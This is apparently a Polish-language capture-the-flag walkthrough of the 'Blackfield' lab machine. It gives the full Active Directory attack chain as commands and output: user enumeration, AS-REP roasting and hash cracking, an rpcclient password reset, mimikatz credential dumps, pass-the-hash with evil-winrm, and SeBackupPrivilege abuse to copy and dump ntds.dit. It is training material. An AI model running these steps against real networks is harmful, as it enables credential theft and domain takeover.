Blackfield

Nmap

nmap -sC -sV -T5 -p- 10.10.10.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 12:12 BST
Stats: 0:03:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 59.83% done; ETC: 12:17 (0:02:00 remaining)
Stats: 0:06:04 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 87.50% done; ETC: 12:19 (0:00:18 remaining)
Nmap scan report for 10.10.10.192
Host is up, received echo-reply ttl 127 (0.10s latency).
Not shown: 65527 filtered ports
Reason: 65527 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain?       syn-ack ttl 127
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-06-09 18:20:34Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/9%Time=5EDF6F9F%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h03m51s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-09T18:22:54
|_  start_date: N/A

User

smbclient -L //10.10.10.192

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	forensic        Disk      Forensic / Audit share.
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	profiles$       Disk      
	SYSVOL          Disk      Logon server share 

Mam dostęp do /profiles$
który się składa z wielu katalogów których nazwy wyglądają jak username’y

smbclient //10.10.10.192/profiles$

AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
AMaceldon
AMasalunga
ANavay
ANesterova
ANeusse
AOkleshen
APustulka
ARotella
ASanwardeker
AShadaia
ASischo
ASpruce
ATakach
ATaueg
ATwardowski
audit2020
AWangenheim
AWorsey
AZigmunt
BBakajza
BBeloucif
BCarmitcheal
BConsultant
BErdossy
BGeminski
BLostal
BMannise
BNovrotsky
BRigiero
BSamkoses
BZandonella
CAcherman
CAkbari
CAldhowaihi
CArgyropolous
CDufrasne
CGronk
Chiucarello
Chiuccariello
CHoytal
CKijauskas
CKolbo
CMakutenas
CMorcillo
CSchandall
CSelters
CTolmie
DCecere
DChintalapalli
DCwilich
DGarbatiuc
DKemesies
DMatuka
DMedeme
DMeherek
DMetych
DPaskalev
DPriporov
DRusanovskaya
DVellela
DVogleson
DZwinak
EBoley
EEulau
EFeatherling
EFrixione
EJenorik
EKmilanovic
ElKatkowsky
EmaCaratenuto
EPalislamovic
EPryar
ESachhitello
ESariotti
ETurgano
EWojtila
FAlirezai
FBaldwind
FBroj
FDeblaquire
FDegeorgio
FianLaginja
FLasokowski
FPflum
FReffey
GaBelithe
Gareld
GBatowski
GForshalger
GGomane
GHisek
GMaroufkhani
GMerewether
GQuinniey
GRoswurm
GWiegard
HBlaziewske
HColantino
HConforto
HCunnally
HGougen
HKostova
IChristijr
IKoledo
IKotecky
ISantosi
JAngvall
JBehmoiras
JDanten
JDjouka
JKondziola
JLeytushsenior
JLuthner
JMoorehendrickson
JPistachio
JScima
JSebaali
JShoenherr
JShuselvt
KAmavisca
KAtolikian
KBrokinn
KCockeril
KColtart
KCyster
KDorney
KKoesno
KLangfur
KMahalik
KMasloch
KMibach
KParvankova
KPregnolato
KRasmor
KShievitz
KSojdelius
KTambourgi
KVlahopoulos
KZyballa
LBajewsky
LBaligand
LBarhamand
LBirer
LBobelis
LChippel
LChoffin
LCominelli
LDruge
LEzepek
LHyungkim
LKarabag
LKirousis
LKnade
LKrioua
LLefebvre
LLoeradeavilez
LMichoud
LTindall
LYturbe
MArcynski
MAthilakshmi
MAttravanam
MBrambini
MHatziantoniou
MHoerauf
MKermarrec
MKillberg
MLapesh
MMakhsous
MMerezio
MNaciri
MShanmugarajah
MSichkar
MTemko
MTipirneni
MTonuri
MVanarsdel
NBellibas
NDikoka
NGenevro
NGoddanti
NMrdirk
NPulido
NRonges
NSchepkie
NVanpraet
OBelghazi
OBushey
OHardybala
OLunas
ORbabka
PBourrat
PBozzelle
PBranti
PCapperella
PCurtz
PDoreste
PGegnas
PMasulla
PMendlinger
PParakat
PProvencer
PTesik
PVinkovich
PVirding
PWeinkaus
RBaliukonis
RBochare
RKrnjaic
RNemnich
RPoretsky
RStuehringer
RSzewczuga
RVallandas
RWeatherl
RWissor
SAbdulagatov
SAjowi
SAlguwaihes
SBonaparte
SBouzane
SChatin
SDellabitta
SDhodapkar
SEulert
SFadrigalan
SGolds
SGrifasi
SGtlinas
SHauht
SHederian
SHelregel
SKrulig
SLewrie
SMaskil
Smocker
SMoyta
SRaustiala
SReppond
SSicliano
SSilex
SSolsbak
STousignaut
support
svc_backup
SWhyte
SWynigear
TAwaysheh
TBadenbach
TCaffo
TCassalom
TEiselt
TFerencdo
TGaleazza
TKauten
TKnupke
TLintlop
TMusselli
TOust
TSlupka
TStausland
TZumpella
UCrofskey
UMarylebone
UPyrke
VBublavy
VButziger
VFuscca
VLitschauer
VMamchuk
VMarija
VOlaosun
VPapalouca
WSaldat
WVerzhbytska
WZelazny
XBemelen
XDadant
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

python2 /opt/impacket/kerbrute/kerbrute.py -domain blackfield.local -users users.txt -passwords /usr/share/wordlists/rockyou.txt -outputfile passwords.txt -dc-ip 10.10.10.192
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Valid user => audit2020
[*] Valid user => support [NOT PREAUTH]
[*] Valid user => svc_backup
python3 /opt/impacket/examples/GetNPUsers.py blackfield.local/ -usersfile users_filtered.txt -dc-ip 10.10.10.192 -format hashcat -outputfile hashes.txt

1$krb5asrep$23$support@BLACKFIELD.LOCAL:8f7f4c2310face41072792a84f5cde3c$db4be3c61ca74174fd053b05f6f465feb1df645123441890930c84889b35924056c4fc0ddb6a6cd5f6ad92ce52f49cdcfd16f04d103d920c980a4f14fa92432e6883f5a8d095a97ca0a3af92f3f969a74a70d8bb53f223c499ef09b889e52ebcfe251085ddf0c43f6e954e058a7bd9a2827a0045a497bd4c1a491d1ec203efefac048424d29ee8477d204bf13d5c07bf8753aaa2070d5b16802e03ea85eb991c7a70ce28529ee4ac3dfbc0214047c3f592c741f063ad029fdab6d252926599152167f811d99ada5bb330915638001a437f824db037ada6c10469a5d8a116ded12cb04114183d53b3b1b41e042dcf671763fedf66

udało mi się wyciągnąć użytkowników i hash który następnie wrzucam do hashcata

hashcat -m 18200 -D 1 -a 0 -n 10 hashes.txt /usr/share/wordlists/rockyou.txt -o support_password --force
support : #00^BlackKnight

z użytkownikiem i hasłem mogę przeszukać LDAP’a

ldapsearch -x -h 10.10.10.192 -D 'support@blackfield.local' -w '#00^BlackKnight' -s sub -b 'DC=BLACKFIELD,DC=local'

Jest bardzo dużo wyników więc użyłem ldapdomaindump

ldapdomaindump -u "BLACKFIELD\support" -p "#00^BlackKnight" --no-json --no-grep 10.10.10.192 

enumerujemy dalej

bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d BLACKFIELD.LOCAL -dc DC01.BLACKFIELD.LOCAL -gc DC01.BLACKFIELD.LOCAL --dns-tcp

Możemy zmienić hasło dla użytkownika

rpcclient -U support //10.10.10.192
setuserinfo2 audit2020 23 'Password123'

mamy dostęp do SMB /forensic

smbclient //10.10.10.192/forensic -U audit2020%Password123

  .                                   D        0  Sun Feb 23 13:03:16 2020
  ..                                  D        0  Sun Feb 23 13:03:16 2020
  commands_output                     D        0  Sun Feb 23 18:14:37 2020
  memory_analysis                     D        0  Thu May 28 21:28:33 2020
  tools                               D        0  Sun Feb 23 13:39:08 2020

w folderze memory analysis są za duże pliki więc pobieram je smbget

smbget -R smb://10.10.10.192/forensic/memory_analysis -U audit2020%Password123

Następnie zrzucam hashe używając mimikatz

sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords

Content Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23.02.2020 20:00:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 365835 (00000000:0005950b)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 365493 (00000000:000593b5)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23.02.2020 19:59:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
tspkg :
wdigest :
* Username : Administrator
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 40310 (00000000:00009d76)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 40232 (00000000:00009d28)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DC01$
Domain : BLACKFIELD
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : dc01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 24410 (00000000:00005f5a)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 406499 (00000000:000633e3)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23.02.2020 20:00:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 366665 (00000000:00059849)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 366649 (00000000:00059839)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 23.02.2020 19:59:38
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 23.02.2020 19:57:47
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 24405 (00000000:00005f55)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 24294 (00000000:00005ee6)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 24282 (00000000:00005eda)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 23.02.2020 19:57:46
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynuQl;gvEE!f$DoO0F+,gP@Pfraz4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En khb’YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
ssp :
credman :
Authentication Id : 0 ; 22028 (00000000:0000560c)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 23.02.2020 19:57:44
SID :
msv :
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DC01$
Domain : BLACKFIELD
Logon Server : (null)
Logon Time : 23.02.2020 19:57:44
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DC01$
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : dc01$
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :

Z przydatnych rzeczy znajdujemy działający hash na użytkownika svc_backup

evil-winrm.rb -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
*Evil-WinRM* PS C:\Users\svc_backup\desktop> cat user.txt
6df032cc9****33a79a48f85

Root

*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

ten użytkownik ma dużo uprawnień i można by wykorzystać SeBackupPrivilege, ale coś nie działa chyba przez EFS
znalazłem kilka możliwości tak więc po kolei…


*Evil-WinRM* PS C:\tmp> reg.exe save hklm\system C:\tmp\system
*Evil-WinRM* PS C:\tmp> download system

Następnie uploadujemy plik i tworzymy shadowcopy. Skrypt “podmontuje” nam dysk C jako dysk T z innymi uprawnieniami

upload skrypt.txt
diskshadow /s skrypt.txt

diskshadow script file
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias Systemvolumeshadow
create
expose %Systemvolumeshadow% t:
expose %Datavolumeshadow% q:
exec c:\temp\cmd.cmd
end backup
End of script

wrzucamy biblioteki przez winrm i następnie ich używamy wg instrukcji na gicie link poniżej

upload SeBackupPrivilegeCmdLets.dll
upload SeBackupPrivilegeUtils.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Get-SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege

cd T:\windows\ntds
Copy-FileSeBackupPrivilege ntds.dit C:\Windows\system32\spool\drivers\color\ntds.dit -Overwrite
cd  C:\Windows\system32\spool\drivers\color\
download ntds.dit

możemy użyć impacket do wyciągnięcia hashy

impacket-secretsdump -system system -ntds ntds.dit local
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
.....
evil-winrm.rb -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
41383e13c077b67****110b545f62f

Leave a Comment